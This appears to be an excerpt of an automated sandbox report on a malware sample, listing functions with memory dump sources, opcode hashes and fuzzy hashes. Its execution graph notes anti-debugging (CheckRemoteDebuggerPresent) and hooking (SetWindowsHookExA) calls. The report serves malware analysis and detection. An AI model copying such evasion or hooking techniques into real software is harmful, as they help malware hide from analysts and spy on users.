                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 070b983440729765f8dcd8ab3407d0d7610ee10b2820330b859ea22a086ead6f
                                                                                        • Instruction ID: e3fe5cc1f8a2d3ee89f9218755809191525c2f7c1a01ffd7a9095be89f5c46d6
                                                                                        • Opcode Fuzzy Hash: 070b983440729765f8dcd8ab3407d0d7610ee10b2820330b859ea22a086ead6f
                                                                                        • Instruction Fuzzy Hash: 000121307412148FE7689B398C51BAA76A2AF98740F2540A8E509AB3E5CF76DC418B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0518 Relevance: .0, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a060ee2094d335189d8a1259ecb132123f1570004e2b86a94f931a714ac9cb95
                                                                                        • Instruction ID: 21a4b16d0d53548e3ef87d5be8f8a1d84cf2b15725995c30fbe530a904fd8433
                                                                                        • Opcode Fuzzy Hash: a060ee2094d335189d8a1259ecb132123f1570004e2b86a94f931a714ac9cb95
                                                                                        • Instruction Fuzzy Hash: 4DF0967131060497D74CA7BA99597BFB69EEFC9340F08443AA10DC3766CF74480187E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0848 Relevance: .0, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a80c31fbf19d6a3b95d6784f286c3553618573a3a19b61f5f586191645ce28d
                                                                                        • Instruction ID: 597acc43dda405f13871f11836c1003da71848cbdd7cec98af4ccc46840ed229
                                                                                        • Opcode Fuzzy Hash: 3a80c31fbf19d6a3b95d6784f286c3553618573a3a19b61f5f586191645ce28d
                                                                                        • Instruction Fuzzy Hash: F601E975D10209EFDB44EFE4D4506AEBBB2EF89304B1085A9D025EB350EB705A459B91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F6470 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 396f70b7add8fa37613e4f960a5ddef59b995d02ce8e3fdbbdb9111367cf2340
                                                                                        • Instruction ID: 6d35885cc7308b5194878e79ce028add79d7270e74d72bdb94a4fec97de4e72c
                                                                                        • Opcode Fuzzy Hash: 396f70b7add8fa37613e4f960a5ddef59b995d02ce8e3fdbbdb9111367cf2340
                                                                                        • Instruction Fuzzy Hash: 1DF0EC3131070897C718FB65DC599AFBB5BEFE43707548825E5094B311CF705D0685D4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FA094 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 024e0dc90e419df9fabe171c9fad9522dbbdc9c821a9a36eaf6261dd0d52b39d
                                                                                        • Instruction ID: 983508476f88a64cf6b634a051ab45dbefff239ceb35bee3b135142ab4268c79
                                                                                        • Opcode Fuzzy Hash: 024e0dc90e419df9fabe171c9fad9522dbbdc9c821a9a36eaf6261dd0d52b39d
                                                                                        • Instruction Fuzzy Hash: CBF0E778E05288EFCF11CFA8D84199CBBB0AF09700F25015AE945A7352DB315912DF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F9238 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e16fa3d8026a9fac353e77986a6eb37b2133a2e0417adaf97255c3cace8955a2
                                                                                        • Instruction ID: 5da05d2bb98dd06d3840ad5a6bacd16ae472d07413e95804e65448ff72151232
                                                                                        • Opcode Fuzzy Hash: e16fa3d8026a9fac353e77986a6eb37b2133a2e0417adaf97255c3cace8955a2
                                                                                        • Instruction Fuzzy Hash: 34F027317012149FE308AB98D4487A6BB96EB85348F68C376D509CF386D73BCC82C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F9228 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5b734fc33a091f10caeee7cfcf60d7d2ff54bd35475779c3362b6bda80743155
                                                                                        • Instruction ID: 83ec5253176f270d42b960e88a92ffd071be686773f49ef528b189ad0c552674
                                                                                        • Opcode Fuzzy Hash: 5b734fc33a091f10caeee7cfcf60d7d2ff54bd35475779c3362b6bda80743155
                                                                                        • Instruction Fuzzy Hash: 4DF02B317053508FE3159B54D4087A57FA2AB46344F5883BED449CF2C6D73B8C41C751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0D50 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0399948b311740c317248ca3f81aeafc9af328ceaec6ec60c9daa09aa541f3ac
                                                                                        • Instruction ID: 6a1819fbf5e4ea1e1c874a1c3bef5edbdb3e55c0fc9fb9c747fbab7d11043a1e
                                                                                        • Opcode Fuzzy Hash: 0399948b311740c317248ca3f81aeafc9af328ceaec6ec60c9daa09aa541f3ac
                                                                                        • Instruction Fuzzy Hash: 29F0E56524D388AEC72707E06C21AB13F219B5F780F4A40DFE1499F4ABD3919552E612
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0AF0 Relevance: .0, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec3b32044177c4c108051a67694e63e673c641435960dce9a51c5c630c5c403b
                                                                                        • Instruction ID: bf280983ad027935cd01aa740963ea6b5de83f2ba6cc28f5cb7177ae32ef99b7
                                                                                        • Opcode Fuzzy Hash: ec3b32044177c4c108051a67694e63e673c641435960dce9a51c5c630c5c403b
                                                                                        • Instruction Fuzzy Hash: F2E0EC212297981E966733B4182107D3E988ED799434904AAD2CA9B293CF155D5743EB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F77F0 Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5427993887eca6bacd94052da04df672b36470ff0a63d3cad84f226681cf420c
                                                                                        • Instruction ID: d27eed00850940ae140a133b12fd8c9d809c2715cb16e6a59f9a2eb972b4e013
                                                                                        • Opcode Fuzzy Hash: 5427993887eca6bacd94052da04df672b36470ff0a63d3cad84f226681cf420c
                                                                                        • Instruction Fuzzy Hash: E9E0123100D2858FD7174BA4DD291207F64AF27381B0905D7D1418F0F3D7655950DB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FCAEF Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0fd70297458990b98383377656ced577c8825a7cbb3f160a9d91da7a8e42ea0a
                                                                                        • Instruction ID: 370f2263446cd6d59fe6148c21d10bed8b041589564046a45d65deb6dfbe394c
                                                                                        • Opcode Fuzzy Hash: 0fd70297458990b98383377656ced577c8825a7cbb3f160a9d91da7a8e42ea0a
                                                                                        • Instruction Fuzzy Hash: 81E09A3A940248EFCB119F44CE0DEA87BB2BF04304F068182F2054B0B2E375C812FB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0D09 Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2ca7d4d83c4b36457718572f168a5fe65bf20de600ffff41ce4d7b198ed8a926
                                                                                        • Instruction ID: 5c3d6a698ad2cc7771d485b30ba80c7179552238a16e1daa410a4a1b286f008a
                                                                                        • Opcode Fuzzy Hash: 2ca7d4d83c4b36457718572f168a5fe65bf20de600ffff41ce4d7b198ed8a926
                                                                                        • Instruction Fuzzy Hash: D2E08C2414C384AFCB2B13E0AC26A623F399B1F644F0A44D7E6898F4B3D6A18950D712
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FA126 Relevance: .0, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f8655d171deb25dfd068067318cb8d1032ec0c720bc249eafe218e1f364a2e30
                                                                                        • Instruction ID: 8fad1af387427cbce717a7a5ebc7c34522f60e373eb9bb08c9c68281f850a6e7
                                                                                        • Opcode Fuzzy Hash: f8655d171deb25dfd068067318cb8d1032ec0c720bc249eafe218e1f364a2e30
                                                                                        • Instruction Fuzzy Hash: 08D05EB2A0401C8F8B04DAA4E8444FDB734EF4A311B511422D60BE3620CB341915D645
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FD9E4 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 892c3626e95a878b6d6abad4d56f11fe9518e786e0722203a174f77ff0115e8c
                                                                                        • Instruction ID: e9ad745cf149ae9373fd10b4541aab9dded18ee7f7fb941769243fcb464c6120
                                                                                        • Opcode Fuzzy Hash: 892c3626e95a878b6d6abad4d56f11fe9518e786e0722203a174f77ff0115e8c
                                                                                        • Instruction Fuzzy Hash: 72E07574D09228DFCB50DFA4E980BADB7F6BB18304F115195E509A7301D7709E84CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FAAB0 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe5304bab1caf306809fd8ede5091b32d61ee82f985056931911c27a5240001e
                                                                                        • Instruction ID: 62ae1500613d2db80309fb75b13f388a26a3b92cf65d7d475fc1fdfd00467427
                                                                                        • Opcode Fuzzy Hash: fe5304bab1caf306809fd8ede5091b32d61ee82f985056931911c27a5240001e
                                                                                        • Instruction Fuzzy Hash: 19D0A77008560CD7E305EFA0DA28B7973ACEF06301F546156850D136508B788E0CE692
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0B00 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1d7c5d1743e97206034235e790bb8c1788700151f1b05708d1a380fb87ec619
                                                                                        • Instruction ID: cd6c93bdc0d57898f14f1a29398842ef22d9b147f4a203dec959863c310ca2a8
                                                                                        • Opcode Fuzzy Hash: d1d7c5d1743e97206034235e790bb8c1788700151f1b05708d1a380fb87ec619
                                                                                        • Instruction Fuzzy Hash: E3D0123136072D17056A33F4181247D21498FC65D8781003DD30B9B2C2CF155D5303E7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F7800 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc80295c971a1d7f0bee2dabaceb837e6819912f948fe1832a388929a44666af
                                                                                        • Instruction ID: 43278e3db20ad83d3c18added106f578b2e2d93bcacf7a1f094ee290b242e025
                                                                                        • Opcode Fuzzy Hash: bc80295c971a1d7f0bee2dabaceb837e6819912f948fe1832a388929a44666af
                                                                                        • Instruction Fuzzy Hash: 89D0A73024C308B7E7251958EC15B30320D5714BC0F100025B3015E1F0C7D28980C5A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F0D18 Relevance: .0, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7e5ecf57eb68cc2e24144e641b0820bc47b04fbbde710d257cb1d286b798cff
                                                                                        • Instruction ID: ef26604363613d3b014c0efd1ab7cf124ee4996d452a5d33b9c83ceb1a68387e
                                                                                        • Opcode Fuzzy Hash: c7e5ecf57eb68cc2e24144e641b0820bc47b04fbbde710d257cb1d286b798cff
                                                                                        • Instruction Fuzzy Hash: AFD0A938244308ABCA2B16D0AC02B32366C670CB80F4200A7A2095E0A2CBB2A8909821
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FAA0E Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f147b988f30bf52586bfd91676776a298cfe5e555eb6f657d1010401906be16e
                                                                                        • Instruction ID: d59a47d3a05eaeb9e8ca6f4571fc776d6bfa29e1196e8bdb61918468ba2458c0
                                                                                        • Opcode Fuzzy Hash: f147b988f30bf52586bfd91676776a298cfe5e555eb6f657d1010401906be16e
                                                                                        • Instruction Fuzzy Hash: 8BD06C78A00128CFDB64CB24C880F99B7B1AB89318F1481D9890DA3302C732AE82CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FFF08 Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c187ad70ac67588dd03a33a5fac36cf694fc1f13d5f291ad5efe9d3ce53d57ea
                                                                                        • Instruction ID: 3dffd13058789c3c177a2549b620c126546a3fb09a37c44611b8e84edf859321
                                                                                        • Opcode Fuzzy Hash: c187ad70ac67588dd03a33a5fac36cf694fc1f13d5f291ad5efe9d3ce53d57ea
                                                                                        • Instruction Fuzzy Hash: F5C08C30002A08C7E3222FA0BD1D738366D7F8221AF002163D10E008308B608415CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FA548 Relevance: .0, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65b84f34c2ca802274b959a60181f3641c27f630e96777417306236e0864df34
                                                                                        • Instruction ID: 477dcc09af2e5388b6415d7be09b48213e2f6221eb28ed862364e89f5d413e62
                                                                                        • Opcode Fuzzy Hash: 65b84f34c2ca802274b959a60181f3641c27f630e96777417306236e0864df34
                                                                                        • Instruction Fuzzy Hash: 65D0EAB4E08219CFCB14CF94D5486FEB7B5AF49305F619016D61AA2250C7796A42DF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 009F4888 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f68c7716022c56fa873bfbb8c522a5cf216e89dd53c399533d036abfd7df1320
                                                                                        • Instruction ID: a7c0aa62e5706d56363e0b587e03b99033bcf61948ed1a2fa83b647f46595b6f
                                                                                        • Opcode Fuzzy Hash: f68c7716022c56fa873bfbb8c522a5cf216e89dd53c399533d036abfd7df1320
                                                                                        • Instruction Fuzzy Hash: 88E11A74E002198FDB14DFA9C580AAEFBB2FF88305F248169D915AB356D731AD41CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F4CC0 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da2fdede5dc09f9c4b243996773cb6d71ce3489eedcab7e19b134518d5fc5f73
                                                                                        • Instruction ID: 9b83cb5997052e630e1e39c4ea31d3f81c7f23a06b9167dc3fd9bc2fee34f163
                                                                                        • Opcode Fuzzy Hash: da2fdede5dc09f9c4b243996773cb6d71ce3489eedcab7e19b134518d5fc5f73
                                                                                        • Instruction Fuzzy Hash: F7E12A74E002198FDB14DF99C5809AEFBB2FF89304F248169D919AB356D731AD42CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F50F8 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b9b4a8ef91c95741652ac5f03dc4da2a32a4abb40c495db1f0a39ab0722d0da1
                                                                                        • Instruction ID: ee0e5bb02eca7723f86ad917ee06f59bbdd790df20042cce7d1b08963ae4796e
                                                                                        • Opcode Fuzzy Hash: b9b4a8ef91c95741652ac5f03dc4da2a32a4abb40c495db1f0a39ab0722d0da1
                                                                                        • Instruction Fuzzy Hash: 31E12874E00619CFDB14DFA8C5809AEFBB2BF89304F248169D915AB356D731AD42CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F4450 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2ca6052b8940a82a20ae09a5d6c1f600989b29af973cf0024e5f0f2a17525e1d
                                                                                        • Instruction ID: e375c47f52f9dd11ab12b55649af8341f50bde4ed04dc655e4e80aaabb9c42d0
                                                                                        • Opcode Fuzzy Hash: 2ca6052b8940a82a20ae09a5d6c1f600989b29af973cf0024e5f0f2a17525e1d
                                                                                        • Instruction Fuzzy Hash: 41E11974E002598FDB14DFA9C5809AEFBB2FF89304F248169D919AB356C731AD42CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F55E0 Relevance: .3, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc22503d51f23fe58583b005309fb4380f086198e9850d75e98f676f1fd1c0fc
                                                                                        • Instruction ID: 6e28bd5fc107de8a9fe947718bd7104f46125193fb5ad7a91e8ff4af99fca4ec
                                                                                        • Opcode Fuzzy Hash: bc22503d51f23fe58583b005309fb4380f086198e9850d75e98f676f1fd1c0fc
                                                                                        • Instruction Fuzzy Hash: 56E13874E00619CFDB14DFA9C5809ADFBB2BF89304F248169D915AB356C731AD82CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F50F1 Relevance: .1, Instructions: 126COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 301bd67981b7c7318359f267486e45d2984c3285e4671223bb87fcbd0cc6f9cf
                                                                                        • Instruction ID: a64a4be88b5e40ee000b677fe86b824d02ea3b8ab7e2c963690ffe9832dfc47b
                                                                                        • Opcode Fuzzy Hash: 301bd67981b7c7318359f267486e45d2984c3285e4671223bb87fcbd0cc6f9cf
                                                                                        • Instruction Fuzzy Hash: 96512C74E006198FDB14DFA9C5805AEFBF2BF89304F24816AD518AB355D7319E42CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:11.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:50%
                                                                                        Total number of Nodes:6
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 20467 1c5348 20468 1c538c CheckRemoteDebuggerPresent 20467->20468 20469 1c53ce 20468->20469 20470 4fa538 20471 4fa57c SetWindowsHookExA 20470->20471 20473 4fa5c2 20471->20473

                                                                                        Executed Functions

                                                                                        Function 001C5348 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1304 1c5348-1c53cc CheckRemoteDebuggerPresent 1306 1c53ce-1c53d4 1304->1306 1307 1c53d5-1c5410 1304->1307 1306->1307
                                                                                        APIs
                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001C53BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.718032319.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_1c0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3662101638-0
                                                                                        • Opcode ID: e45ddd85885c73e1dafa4acbaad9b39d67360b110f96ba5930bb14a9d18d2fd2
                                                                                        • Instruction ID: 77a1f4fc30fab4b73166473526154bb307cb42bea579df9266fb80eb3edf41e9
                                                                                        • Opcode Fuzzy Hash: e45ddd85885c73e1dafa4acbaad9b39d67360b110f96ba5930bb14a9d18d2fd2
